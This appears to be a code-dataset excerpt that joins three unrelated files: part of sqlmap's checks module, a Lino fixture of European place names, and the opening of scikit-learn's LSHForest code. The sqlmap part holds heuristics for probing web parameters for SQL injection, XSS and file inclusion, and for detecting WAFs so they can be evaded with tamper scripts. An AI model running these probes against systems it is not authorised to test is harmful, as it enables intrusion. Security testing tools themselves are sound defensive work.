randInt = randomInt()
if not checkBooleanExpression("%d=%s%d" % (randInt, ' ' * SUHOSIN_MAX_VALUE_LENGTH, randInt)):
warnMsg = "parameter length constrainting "
warnMsg += "mechanism detected (e.g. Suhosin patch). "
warnMsg += "Potential problems in enumeration phase can be expected"
logger.warn(warnMsg)
kb.injection = popValue()
def checkFilteredChars(injection):
debugMsg = "checking for filtered characters"
logger.debug(debugMsg)
pushValue(kb.injection)
kb.injection = injection
randInt = randomInt()
# all other techniques are already using parentheses in tests
if len(injection.data) == 1 and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:
if not checkBooleanExpression("(%d)=%d" % (randInt, randInt)):
warnMsg = "it appears that some non-alphanumeric characters (i.e. ()) are "
warnMsg += "filtered by the back-end server. There is a strong "
warnMsg += "possibility that sqlmap won't be able to properly "
warnMsg += "exploit this vulnerability"
logger.warn(warnMsg)
# inference techniques depend on character '>'
if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)):
if not checkBooleanExpression("%d>%d" % (randInt+1, randInt)):
warnMsg = "it appears that the character '>' is "
warnMsg += "filtered by the back-end server. You are strongly "
warnMsg += "advised to rerun with the '--tamper=between'"
logger.warn(warnMsg)
kb.injection = popValue()
def heuristicCheckSqlInjection(place, parameter):
if kb.nullConnection:
debugMsg = "heuristic check skipped because NULL connection used"
logger.debug(debugMsg)
return None
origValue = conf.paramDict[place][parameter]
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
prefix = ""
suffix = ""
if conf.prefix or conf.suffix:
if conf.prefix:
prefix = conf.prefix
if conf.suffix:
suffix = conf.suffix
randStr = ""
while '\'' not in randStr:
randStr = randomStr(length=10, alphabet=HEURISTIC_CHECK_ALPHABET)
kb.heuristicMode = True
payload = "%s%s%s" % (prefix, randStr, suffix)
payload = agent.payload(place, parameter, newValue=payload)
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
kb.heuristicMode = False
parseFilePaths(page)
result = wasLastResponseDBMSError()
infoMsg = "heuristic (basic) test shows that %s parameter " % paramType
infoMsg += "'%s' might " % parameter
def _(page):
return any(_ in (page or "") for _ in FORMAT_EXCEPTION_STRINGS)
casting = _(page) and not _(kb.originalPage)
if not casting and not result and kb.dynamicParameter and origValue.isdigit():
randInt = int(randomInt())
payload = "%s%s%s" % (prefix, "%d-%d" % (int(origValue) + randInt, randInt), suffix)
payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)
result = Request.queryPage(payload, place, raise404=False)
if not result:
randStr = randomStr()
payload = "%s%s%s" % (prefix, "%s.%d%s" % (origValue, random.randint(1, 9), randStr), suffix)
payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)
casting = Request.queryPage(payload, place, raise404=False)
kb.heuristicTest = HEURISTIC_TEST.CASTED if casting else HEURISTIC_TEST.NEGATIVE if not result else HEURISTIC_TEST.POSITIVE
if casting:
errMsg = "possible %s casting " % ("integer" if origValue.isdigit() else "type")
errMsg += "detected (e.g. \"$%s=intval($_REQUEST['%s'])\") " % (parameter, parameter)
errMsg += "at the back-end web application"
logger.error(errMsg)
if kb.ignoreCasted is None:
message = "do you want to skip those kind of cases (and save scanning time)? %s " % ("[Y/n]" if conf.multipleTargets else "[y/N]")
kb.ignoreCasted = readInput(message, default='Y' if conf.multipleTargets else 'N').upper() != 'N'
elif result:
infoMsg += "be injectable"
if Backend.getErrorParsedDBMSes():
infoMsg += " (possible DBMS: '%s')" % Format.getErrorParsedDBMSes()
logger.info(infoMsg)
else:
infoMsg += "not be injectable"
logger.warn(infoMsg)
kb.heuristicMode = True
randStr1, randStr2 = randomStr(NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH), randomStr(NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH)
value = "%s%s%s" % (randStr1, DUMMY_NON_SQLI_CHECK_APPENDIX, randStr2)
payload = "%s%s%s" % (prefix, "'%s" % value, suffix)
payload = agent.payload(place, parameter, newValue=payload)
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
if value.lower() in (page or "").lower():
infoMsg = "heuristic (XSS) test shows that %s parameter " % paramType
infoMsg += "'%s' might be vulnerable to cross-site scripting attacks" % parameter
logger.info(infoMsg)
for match in re.finditer("(?i)[^\n]*(no such file|failed (to )?open)[^\n]*", page or ""):
if randStr1.lower() in match.group(0).lower():
infoMsg = "heuristic (FI) test shows that %s parameter " % paramType
infoMsg += "'%s' might be vulnerable to file inclusion attacks" % parameter
logger.info(infoMsg)
break
kb.heuristicMode = False
return kb.heuristicTest
def checkDynParam(place, parameter, value):
"""
This function checks if the URL parameter is dynamic. If it is
dynamic, the content of the page differs, otherwise the
dynamicity might depend on another parameter.
"""
if kb.redirectChoice:
return None
kb.matchRatio = None
dynResult = None
randInt = randomInt()
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
infoMsg = "testing if %s parameter '%s' is dynamic" % (paramType, parameter)
logger.info(infoMsg)
try:
payload = agent.payload(place, parameter, value, getUnicode(randInt))
dynResult = Request.queryPage(payload, place, raise404=False)
if not dynResult:
infoMsg = "confirming that %s parameter '%s' is dynamic" % (paramType, parameter)
logger.info(infoMsg)
randInt = randomInt()
payload = agent.payload(place, parameter, value, getUnicode(randInt))
dynResult = Request.queryPage(payload, place, raise404=False)
except SqlmapConnectionException:
pass
result = None if dynResult is None else not dynResult
kb.dynamicParameter = result
return result
def checkDynamicContent(firstPage, secondPage):
"""
This function checks for the dynamic content in the provided pages
"""
if kb.nullConnection:
debugMsg = "dynamic content checking skipped "
debugMsg += "because NULL connection used"
logger.debug(debugMsg)
return
if any(page is None for page in (firstPage, secondPage)):
warnMsg = "can't check dynamic content "
warnMsg += "because of lack of page content"
logger.critical(warnMsg)
return
seqMatcher = getCurrentThreadData().seqMatcher
seqMatcher.set_seq1(firstPage)
seqMatcher.set_seq2(secondPage)
# In case of an intolerable difference turn on dynamicity removal engine
if seqMatcher.quick_ratio() <= UPPER_RATIO_BOUND:
findDynamicContent(firstPage, secondPage)
count = 0
while not Request.queryPage():
count += 1
if count > conf.retries:
warnMsg = "target URL is too dynamic. "
warnMsg += "Switching to '--text-only' "
logger.warn(warnMsg)
conf.textOnly = True
return
warnMsg = "target URL is heavily dynamic"
warnMsg += ". sqlmap is going to retry the request"
logger.critical(warnMsg)
secondPage, _ = Request.queryPage(content=True)
findDynamicContent(firstPage, secondPage)
def checkStability():
"""
This function checks if the URL content is stable requesting the
same page two times with a small delay within each request to
assume that it is stable.
In case the content of the page differs when requesting
the same page, the dynamicity might depend on other parameters,
like for instance string matching (--string).
"""
infoMsg = "testing if the target URL is stable"
logger.info(infoMsg)
firstPage = kb.originalPage # set inside checkConnection()
delay = 1 - (time.time() - (kb.originalPageTime or 0))
delay = max(0, min(1, delay))
time.sleep(delay)
secondPage, _ = Request.queryPage(content=True, noteResponseTime=False, raise404=False)
if kb.redirectChoice:
return None
kb.pageStable = (firstPage == secondPage)
if kb.pageStable:
if firstPage:
infoMsg = "target URL is stable"
logger.info(infoMsg)
else:
errMsg = "there was an error checking the stability of page "
errMsg += "because of lack of content. Please check the "
errMsg += "page request results (and probable errors) by "
errMsg += "using higher verbosity levels"
logger.error(errMsg)
else:
warnMsg = "target URL is not stable. sqlmap will base the page "
warnMsg += "comparison on a sequence matcher. If no dynamic nor "
warnMsg += "injectable parameters are detected, or in case of "
warnMsg += "junk results, refer to user's manual paragraph "
warnMsg += "'Page comparison' and provide a string or regular "
warnMsg += "expression to match on"
logger.warn(warnMsg)
message = "how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] "
test = readInput(message, default="C")
if test and test[0] in ("q", "Q"):
raise SqlmapUserQuitException
elif test and test[0] in ("s", "S"):
showStaticWords(firstPage, secondPage)
message = "please enter value for parameter 'string': "
test = readInput(message)
if test:
conf.string = test
if kb.nullConnection:
debugMsg = "turning off NULL connection "
debugMsg += "support because of string checking"
logger.debug(debugMsg)
kb.nullConnection = None
else:
errMsg = "Empty value supplied"
raise SqlmapNoneDataException(errMsg)
elif test and test[0] in ("r", "R"):
message = "please enter value for parameter 'regex': "
test = readInput(message)
if test:
conf.regex = test
if kb.nullConnection:
debugMsg = "turning off NULL connection "
debugMsg += "support because of regex checking"
logger.debug(debugMsg)
kb.nullConnection = None
else:
errMsg = "Empty value supplied"
raise SqlmapNoneDataException(errMsg)
else:
checkDynamicContent(firstPage, secondPage)
return kb.pageStable
def checkString():
if not conf.string:
return True
infoMsg = "testing if the provided string is within the "
infoMsg += "target URL page content"
logger.info(infoMsg)
page, headers = Request.queryPage(content=True)
rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)
if conf.string not in rawResponse:
warnMsg = "you provided '%s' as the string to " % conf.string
warnMsg += "match, but such a string is not within the target "
warnMsg += "URL raw response, sqlmap will carry on anyway"
logger.warn(warnMsg)
return True
def checkRegexp():
if not conf.regexp:
return True
infoMsg = "testing if the provided regular expression matches within "
infoMsg += "the target URL page content"
logger.info(infoMsg)
page, headers = Request.queryPage(content=True)
rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)
if not re.search(conf.regexp, rawResponse, re.I | re.M):
warnMsg = "you provided '%s' as the regular expression to " % conf.regexp
warnMsg += "match, but such a regular expression does not have any "
warnMsg += "match within the target URL raw response, sqlmap "
warnMsg += "will carry on anyway"
logger.warn(warnMsg)
return True
def checkWaf():
"""
Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
"""
if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline, conf.skipWaf)):
return None
_ = hashDBRetrieve(HASHDB_KEYS.CHECK_WAF_RESULT, True)
if _ is not None:
if _:
warnMsg = "previous heuristics detected that the target "
warnMsg += "is protected by some kind of WAF/IPS/IDS"
logger.critical(warnMsg)
return _
infoMsg = "checking if the target is protected by "
infoMsg += "some kind of WAF/IPS/IDS"
logger.info(infoMsg)
retVal = False
payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD)
value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
value += agent.addPayloadDelimiters("%s=%s" % (randomStr(), payload))
pushValue(conf.timeout)
conf.timeout = IDS_WAF_CHECK_TIMEOUT
try:
retVal = Request.queryPage(place=PLACE.GET, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO
except SqlmapConnectionException:
retVal = True
finally:
kb.matchRatio = None
conf.timeout = popValue()
if retVal:
warnMsg = "heuristics detected that the target "
warnMsg += "is protected by some kind of WAF/IPS/IDS"
logger.critical(warnMsg)
if not conf.identifyWaf:
message = "do you want sqlmap to try to detect backend "
message += "WAF/IPS/IDS? [y/N] "
output = readInput(message, default="N")
if output and output[0] in ("Y", "y"):
conf.identifyWaf = True
if conf.timeout == defaults.timeout:
logger.warning("dropping timeout to %d seconds (i.e. '--timeout=%d')" % (IDS_WAF_CHECK_TIMEOUT, IDS_WAF_CHECK_TIMEOUT))
conf.timeout = IDS_WAF_CHECK_TIMEOUT
hashDBWrite(HASHDB_KEYS.CHECK_WAF_RESULT, retVal, True)
return retVal
def identifyWaf():
if not conf.identifyWaf:
return None
kb.testMode = True
infoMsg = "using WAF scripts to detect "
infoMsg += "backend WAF/IPS/IDS protection"
logger.info(infoMsg)
@cachedmethod
def _(*args, **kwargs):
page, headers, code = None, None, None
try:
pushValue(kb.redirectChoice)
kb.redirectChoice = REDIRECTION.NO
if kwargs.get("get"):
kwargs["get"] = urlencode(kwargs["get"])
kwargs["raise404"] = False
kwargs["silent"] = True
page, headers, code = Request.getPage(*args, **kwargs)
except Exception:
pass
finally:
kb.redirectChoice = popValue()
return page or "", headers or {}, code
retVal = False
for function, product in kb.wafFunctions:
try:
logger.debug("checking for WAF/IDS/IPS product '%s'" % product)
found = function(_)
except Exception, ex:
errMsg = "exception occurred while running "
errMsg += "WAF script for '%s' ('%s')" % (product, getSafeExString(ex))
logger.critical(errMsg)
found = False
if found:
retVal = product
break
if retVal:
errMsg = "WAF/IDS/IPS identified '%s'. Please " % retVal
errMsg += "consider usage of tamper scripts (option '--tamper')"
logger.critical(errMsg)
message = "are you sure that you want to "
message += "continue with further target testing? [y/N] "
output = readInput(message, default="N")
if output and output[0] not in ("Y", "y"):
raise SqlmapUserQuitException
else:
warnMsg = "no WAF/IDS/IPS product has been identified (this doesn't mean that there is none)"
logger.warn(warnMsg)
kb.testType = None
kb.testMode = False
return retVal
def checkNullConnection():
"""
Reference: http://www.wisec.it/sectou.php?id=472f952d79293
"""
if conf.data:
return False
infoMsg = "testing NULL connection to the target URL"
logger.info(infoMsg)
try:
pushValue(kb.pageCompress)
kb.pageCompress = False
page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD)
if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
kb.nullConnection = NULLCONNECTION.HEAD
infoMsg = "NULL connection is supported with HEAD header"
logger.info(infoMsg)
else:
page, headers, _ = Request.getPage(auxHeaders={HTTP_HEADER.RANGE: "bytes=-1"})
if page and len(page) == 1 and HTTP_HEADER.CONTENT_RANGE in (headers or {}):
kb.nullConnection = NULLCONNECTION.RANGE
infoMsg = "NULL connection is supported with GET header "
infoMsg += "'%s'" % kb.nullConnection
logger.info(infoMsg)
else:
_, headers, _ = Request.getPage(skipRead = True)
if HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
kb.nullConnection = NULLCONNECTION.SKIP_READ
infoMsg = "NULL connection is supported with 'skip-read' method"
logger.info(infoMsg)
except SqlmapConnectionException, ex:
errMsg = getSafeExString(ex)
raise SqlmapConnectionException(errMsg)
finally:
kb.pageCompress = popValue()
return kb.nullConnection is not None
def checkConnection(suppressOutput=False):
if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)):
try:
debugMsg = "resolving hostname '%s'" % conf.hostname
logger.debug(debugMsg)
socket.getaddrinfo(conf.hostname, None)
except socket.gaierror:
errMsg = "host '%s' does not exist" % conf.hostname
raise SqlmapConnectionException(errMsg)
except socket.error, ex:
errMsg = "problem occurred while "
errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex))
raise SqlmapConnectionException(errMsg)
if not suppressOutput and not conf.dummy and not conf.offline:
infoMsg = "testing connection to the target URL"
logger.info(infoMsg)
try:
kb.originalPageTime = time.time()
page, headers = Request.queryPage(content=True, noteResponseTime=False)
kb.originalPage = kb.pageTemplate = page
kb.errorIsNone = False
if not kb.originalPage and wasLastResponseHTTPError():
errMsg = "unable to retrieve page content"
raise SqlmapConnectionException(errMsg)
elif wasLastResponseDBMSError():
warnMsg = "there is a DBMS error found in the HTTP response body "
warnMsg += "which could interfere with the results of the tests"
logger.warn(warnMsg)
elif wasLastResponseHTTPError():
warnMsg = "the web server responded with an HTTP error code (%d) " % getLastRequestHTTPError()
warnMsg += "which could interfere with the results of the tests"
logger.warn(warnMsg)
else:
kb.errorIsNone = True
except SqlmapConnectionException, ex:
if conf.ipv6:
warnMsg = "check connection to a provided "
warnMsg += "IPv6 address with a tool like ping6 "
warnMsg += "(e.g. 'ping6 -I eth0 %s') " % conf.hostname
warnMsg += "prior to running sqlmap to avoid "
warnMsg += "any addressing issues"
singleTimeWarnMessage(warnMsg)
if any(code in kb.httpErrorCodes for code in (httplib.NOT_FOUND, )):
errMsg = getSafeExString(ex)
logger.critical(errMsg)
if conf.multipleTargets:
return False
msg = "it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] "
if readInput(msg, default="Y") not in ("n", "N"):
raise SqlmapSilentQuitException
else:
kb.ignoreNotFound = True
else:
raise
return True
def setVerbosity(): # Cross-linked function
raise NotImplementedError
| apache-2.0 | -3,696,851,722,364,890,600 | 42.704385 | 235 | 0.566264 | false |
lino-framework/welfare | lino_welfare/projects/gerd/tests/dumps/18.8.0/countries_place.py | 2 | 8075 | # -*- coding: UTF-8 -*-
logger.info("Loading 78 objects to table countries_place...")
# fields: id, parent, name, country, zip_code, type, show_type, inscode
loader.save(create_countries_place(1,None,['Eupen', '', ''],u'BE',u'4700',u'50',False,u'63023'))
loader.save(create_countries_place(2,1,['Nispert', '', ''],u'BE',u'',u'55',False,u''))
loader.save(create_countries_place(3,None,['Burg-Reuland', '', ''],u'BE',u'4790',u'50',False,u'63087'))
loader.save(create_countries_place(4,3,['Ouren', '', ''],u'BE',u'',u'55',False,u''))
loader.save(create_countries_place(5,None,['Kelmis', 'La Calamine', 'Kelmis'],u'BE',u'4720',u'50',False,u'63040'))
loader.save(create_countries_place(6,None,['Kettenis', '', ''],u'BE',u'4701',u'70',False,u'63023'))
loader.save(create_countries_place(7,None,['Raeren', '', ''],u'BE',u'4730',u'70',False,u'63061'))
loader.save(create_countries_place(8,None,['Angleur', '', ''],u'BE',u'4031',u'50',False,u'62063'))
loader.save(create_countries_place(9,None,['Ans', '', ''],u'BE',u'4430',u'50',False,u'62003'))
loader.save(create_countries_place(10,None,['Ottignies', '', ''],u'BE',u'1340',u'50',False,u'25121'))
loader.save(create_countries_place(11,None,['Thieusies', '', ''],u'BE',u'7061',u'50',False,u'55040'))
loader.save(create_countries_place(12,None,['Cuesmes', '', ''],u'BE',u'7033',u'50',False,u'53053'))
loader.save(create_countries_place(13,None,['La Reid', '', ''],u'BE',u'4910',u'50',False,u'63076'))
loader.save(create_countries_place(14,None,['Bl\xe9gny', '', ''],u'BE',u'4670',u'50',False,u'62119'))
loader.save(create_countries_place(15,None,['Trembleur', '', ''],u'BE',u'4670',u'50',False,u'62119'))
loader.save(create_countries_place(16,None,['Mortier', '', ''],u'BE',u'4670',u'50',False,u'62119'))
loader.save(create_countries_place(17,None,['Cerfontaine', '', ''],u'BE',u'5630',u'50',False,u'93010'))
loader.save(create_countries_place(18,None,['Burdinne', '', ''],u'BE',u'4210',u'50',False,u'61010'))
loader.save(create_countries_place(19,None,['Antwerpen', 'Anvers', 'Anvers'],u'BE',u'',u'21',False,u''))
loader.save(create_countries_place(20,None,['Luxemburg', 'Luxembourg', 'Luxembourg'],u'BE',u'',u'21',False,u''))
loader.save(create_countries_place(21,None,['Nam\xfcr', 'Namur', 'Namur'],u'BE',u'',u'21',False,u''))
loader.save(create_countries_place(22,None,['Limburg', 'Limbourg', 'Limbourg'],u'BE',u'',u'21',False,u''))
loader.save(create_countries_place(23,22,['Aalst-bij-Sint-Truiden', '', ''],u'BE',u'3800',u'70',False,u''))
loader.save(create_countries_place(24,None,['L\xfcttich', 'Li\xe8ge', 'Li\xe8ge'],u'BE',u'',u'21',False,u''))
loader.save(create_countries_place(25,24,['L\xfcttich', 'Li\xe8ge', 'Li\xe8ge'],u'BE',u'4000',u'50',False,u''))
loader.save(create_countries_place(26,24,['B\xfctgenbach', 'Butgenbach', 'Butgenbach'],u'BE',u'4750',u'50',False,u'63013'))
loader.save(create_countries_place(27,24,['B\xfcllingen', 'Bullange', 'B\xfcllingen'],u'BE',u'4760',u'50',False,u'63012'))
loader.save(create_countries_place(28,24,['Sankt Vith', 'Saint-Vith', 'Sankt Vith'],u'BE',u'4780',u'50',False,u'63067'))
loader.save(create_countries_place(29,24,['Recht', 'Recht', 'Recht'],u'BE',u'4780',u'50',False,u'63067'))
loader.save(create_countries_place(30,24,['Baelen', 'Baelen', 'Baelen'],u'BE',u'4837',u'50',False,u''))
loader.save(create_countries_place(31,None,['Hennegau', 'Hainaut', 'Hainaut'],u'BE',u'',u'21',False,u''))
loader.save(create_countries_place(32,None,['Wallonisch-Brabant', 'Brabant wallon', 'Brabant wallon'],u'BE',u'',u'21',False,u''))
loader.save(create_countries_place(33,None,['Fl\xe4misch-Brabant', 'Brabant flamant', 'Brabant flamant'],u'BE',u'',u'21',False,u''))
loader.save(create_countries_place(34,None,['Ostflandern', "Flandre de l'Est", "Flandre de l'Est"],u'BE',u'',u'21',False,u''))
loader.save(create_countries_place(35,34,['Aalst', 'Alost', 'Aalst'],u'BE',u'9300',u'50',False,u'41002'))
loader.save(create_countries_place(36,35,['Gijzegem', '', ''],u'BE',u'9308',u'70',False,u'41002'))
loader.save(create_countries_place(37,35,['Baardegem', '', ''],u'BE',u'9310',u'70',False,u'41002'))
loader.save(create_countries_place(38,35,['Erembodegem', '', ''],u'BE',u'9320',u'70',False,u''))
loader.save(create_countries_place(39,35,['Herdersem', '', ''],u'BE',u'9310',u'70',False,u'41002'))
loader.save(create_countries_place(40,35,['Hofstade', '', ''],u'BE',u'9308',u'70',False,u''))
loader.save(create_countries_place(41,35,['Meldert', '', ''],u'BE',u'9310',u'70',False,u''))
loader.save(create_countries_place(42,35,['Nieuwerkerken', '', ''],u'BE',u'9320',u'70',False,u''))
loader.save(create_countries_place(43,35,['Moorsel', '', ''],u'BE',u'9310',u'70',False,u'41002'))
loader.save(create_countries_place(44,None,['Westflandern', "Flandre de l'Ouest", "Flandre de l'Ouest"],u'BE',u'',u'21',False,u''))
loader.save(create_countries_place(45,None,['Br\xfcssel', 'Bruxelles', 'Brussels'],u'BE',u'1000',u'50',False,u''))
loader.save(create_countries_place(46,None,['Bergen', 'Mons', 'Mons'],u'BE',u'7000',u'50',False,u''))
loader.save(create_countries_place(47,None,['Ostende', 'Ostende', 'Ostende'],u'BE',u'8400',u'50',False,u''))
loader.save(create_countries_place(48,None,['Nam\xfcr', 'Namur', 'Namur'],u'BE',u'5000',u'50',False,u''))
loader.save(create_countries_place(49,None,['Harju', '', ''],u'EE',u'',u'20',False,u''))
loader.save(create_countries_place(50,None,['P\xe4rnu', '', ''],u'EE',u'',u'20',False,u''))
loader.save(create_countries_place(51,None,['Rapla', '', ''],u'EE',u'',u'20',False,u''))
loader.save(create_countries_place(52,51,['Vigala', '', ''],u'EE',u'',u'52',False,u''))
loader.save(create_countries_place(53,51,['Rapla', '', ''],u'EE',u'',u'51',False,u''))
loader.save(create_countries_place(54,49,['Tallinn', '', ''],u'EE',u'',u'51',False,u''))
loader.save(create_countries_place(55,54,['Kesklinn', '', ''],u'EE',u'',u'55',False,u''))
loader.save(create_countries_place(56,54,['P\xf5hja-Tallinn', '', ''],u'EE',u'',u'55',False,u''))
loader.save(create_countries_place(57,50,['P\xe4rnu', '', ''],u'EE',u'',u'51',False,u''))
loader.save(create_countries_place(58,None,['Tartu', '', ''],u'EE',u'',u'51',False,u''))
loader.save(create_countries_place(59,None,['Narva', '', ''],u'EE',u'',u'51',False,u''))
loader.save(create_countries_place(60,49,['\xc4\xe4sm\xe4e', '', ''],u'EE',u'',u'51',False,u''))
loader.save(create_countries_place(61,None,['Aachen', 'Aix-la-Chapelle', 'Aachen'],u'DE',u'',u'50',False,u''))
loader.save(create_countries_place(62,None,['K\xf6ln', 'Cologne', 'Cologne'],u'DE',u'',u'50',False,u''))
loader.save(create_countries_place(63,None,['Berlin', '', ''],u'DE',u'',u'50',False,u''))
loader.save(create_countries_place(64,None,['Hamburg', '', ''],u'DE',u'',u'50',False,u''))
loader.save(create_countries_place(65,None,['M\xfcnchen', 'Munich', 'Munich'],u'DE',u'',u'50',False,u''))
loader.save(create_countries_place(66,None,['Monschau', 'Montjoie', 'Monschau'],u'DE',u'',u'50',False,u''))
loader.save(create_countries_place(67,None,['Maastricht', '', ''],u'NL',u'',u'50',False,u''))
loader.save(create_countries_place(68,None,['Amsterdam', '', ''],u'NL',u'',u'50',False,u''))
loader.save(create_countries_place(69,None,['Den Haag', '', ''],u'NL',u'',u'50',False,u''))
loader.save(create_countries_place(70,None,['Rotterdam', '', ''],u'NL',u'',u'50',False,u''))
loader.save(create_countries_place(71,None,['Utrecht', '', ''],u'NL',u'',u'50',False,u''))
loader.save(create_countries_place(72,None,['Breda', '', ''],u'NL',u'',u'50',False,u''))
loader.save(create_countries_place(73,None,['Paris', 'Paris', 'Paris'],u'FR',u'',u'50',False,u''))
loader.save(create_countries_place(74,None,['Nizza', 'Nice', 'Nice'],u'FR',u'',u'50',False,u''))
loader.save(create_countries_place(75,None,['Metz', '', ''],u'FR',u'',u'50',False,u''))
loader.save(create_countries_place(76,None,['Strasbourg', '', ''],u'FR',u'',u'50',False,u''))
loader.save(create_countries_place(77,None,['Nancy', '', ''],u'FR',u'',u'50',False,u''))
loader.save(create_countries_place(78,None,['Marseille', '', ''],u'FR',u'',u'50',False,u''))
loader.flush_deferred_objects()
| agpl-3.0 | 3,086,057,760,075,443,700 | 96.289157 | 132 | 0.648297 | false |
rvraghav93/scikit-learn | sklearn/neighbors/approximate.py | 3 | 22554 | """Approximate nearest neighbor search"""
# Author: Maheshakya Wijewardena <[email protected]>
# Joel Nothman <[email protected]>
import numpy as np
import warnings
from scipy import sparse
from .base import KNeighborsMixin, RadiusNeighborsMixin
from ..base import BaseEstimator
from ..utils.validation import check_array
from ..utils import check_random_state
from ..metrics.pairwise import pairwise_distances
from ..random_projection import GaussianRandomProjection
__all__ = ["LSHForest"]
HASH_DTYPE = '>u4'
MAX_HASH_SIZE = np.dtype(HASH_DTYPE).itemsize * 8
def _find_matching_indices(tree, bin_X, left_mask, right_mask):
"""Finds indices in sorted array of integers.
Most significant h bits in the binary representations of the
integers are matched with the items' most significant h bits.
"""
left_index = np.searchsorted(tree, bin_X & left_mask)
right_index = np.searchsorted(tree, bin_X | right_mask,
side='right')
return left_index, right_index
def _find_longest_prefix_match(tree, bin_X, hash_size,
left_masks, right_masks):
"""Find the longest prefix match in tree for each query in bin_X
Most significant bits are considered as the prefix.
"""
hi = np.empty_like(bin_X, dtype=np.intp)
hi.fill(hash_size)
lo = np.zeros_like(bin_X, dtype=np.intp)
res = np.empty_like(bin_X, dtype=np.intp)
left_idx, right_idx = _find_matching_indices(tree, bin_X,
left_masks[hi],
right_masks[hi])
found = right_idx > left_idx
res[found] = lo[found] = hash_size
r = np.arange(bin_X.shape[0])
kept = r[lo < hi] # indices remaining in bin_X mask
while kept.shape[0]:
mid = (lo.take(kept) + hi.take(kept)) // 2
left_idx, right_idx = _find_matching_indices(tree,
bin_X.take(kept),
left_masks[mid],
right_masks[mid])
found = right_idx > left_idx
mid_found = mid[found]
lo[kept[found]] = mid_found + 1
res[kept[found]] = mid_found
hi[kept[~found]] = mid[~found]
kept = r[lo < hi]
return res
class ProjectionToHashMixin(object):
"""Turn a transformed real-valued array into a hash"""
@staticmethod
def _to_hash(projected):
if projected.shape[1] % 8 != 0:
raise ValueError('Require reduced dimensionality to be a multiple '
'of 8 for hashing')
# XXX: perhaps non-copying operation better
out = np.packbits((projected > 0).astype(int)).view(dtype=HASH_DTYPE)
return out.reshape(projected.shape[0], -1)
def fit_transform(self, X, y=None):
self.fit(X)
return self.transform(X)
def transform(self, X):
return self._to_hash(super(ProjectionToHashMixin, self).transform(X))
class GaussianRandomProjectionHash(ProjectionToHashMixin,
GaussianRandomProjection):
"""Use GaussianRandomProjection to produce a cosine LSH fingerprint"""
def __init__(self,
n_components=32,
random_state=None):
super(GaussianRandomProjectionHash, self).__init__(
n_components=n_components,
random_state=random_state)
def _array_of_arrays(list_of_arrays):
"""Creates an array of array from list of arrays."""
out = np.empty(len(list_of_arrays), dtype=object)
out[:] = list_of_arrays
return out
class LSHForest(BaseEstimator, KNeighborsMixin, RadiusNeighborsMixin):
"""Performs approximate nearest neighbor search using LSH forest.
LSH Forest: Locality Sensitive Hashing forest [1] is an alternative
method for vanilla approximate nearest neighbor search methods.
LSH forest data structure has been implemented using sorted
arrays and binary search and 32 bit fixed-length hashes.
Random projection is used as the hash family which approximates
cosine distance.
The cosine distance is defined as ``1 - cosine_similarity``: the lowest
value is 0 (identical point) but it is bounded above by 2 for the farthest
points. Its value does not depend on the norm of the vector points but
only on their relative angles.
Read more in the :ref:`User Guide <approximate_nearest_neighbors>`.
Parameters
----------
n_estimators : int (default = 10)
Number of trees in the LSH Forest.
min_hash_match : int (default = 4)
lowest hash length to be searched when candidate selection is
performed for nearest neighbors.
n_candidates : int (default = 10)
Minimum number of candidates evaluated per estimator, assuming enough
items meet the `min_hash_match` constraint.
n_neighbors : int (default = 5)
Number of neighbors to be returned from query function when
it is not provided to the :meth:`kneighbors` method.
radius : float, optinal (default = 1.0)
Radius from the data point to its neighbors. This is the parameter
space to use by default for the :meth`radius_neighbors` queries.
radius_cutoff_ratio : float, optional (default = 0.9)
A value ranges from 0 to 1. Radius neighbors will be searched until
the ratio between total neighbors within the radius and the total
candidates becomes less than this value unless it is terminated by
hash length reaching `min_hash_match`.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Attributes
----------
hash_functions_ : list of GaussianRandomProjectionHash objects
Hash function g(p,x) for a tree is an array of 32 randomly generated
float arrays with the same dimension as the data set. This array is
stored in GaussianRandomProjectionHash object and can be obtained
from ``components_`` attribute.
trees_ : array, shape (n_estimators, n_samples)
Each tree (corresponding to a hash function) contains an array of
sorted hashed values. The array representation may change in future
versions.
original_indices_ : array, shape (n_estimators, n_samples)
Original indices of sorted hashed values in the fitted index.
References
----------
.. [1] M. Bawa, T. Condie and P. Ganesan, "LSH Forest: Self-Tuning
Indexes for Similarity Search", WWW '05 Proceedings of the
14th international conference on World Wide Web, 651-660,
2005.
Examples
--------
>>> from sklearn.neighbors import LSHForest
>>> X_train = [[5, 5, 2], [21, 5, 5], [1, 1, 1], [8, 9, 1], [6, 10, 2]]
>>> X_test = [[9, 1, 6], [3, 1, 10], [7, 10, 3]]
>>> lshf = LSHForest(random_state=42)
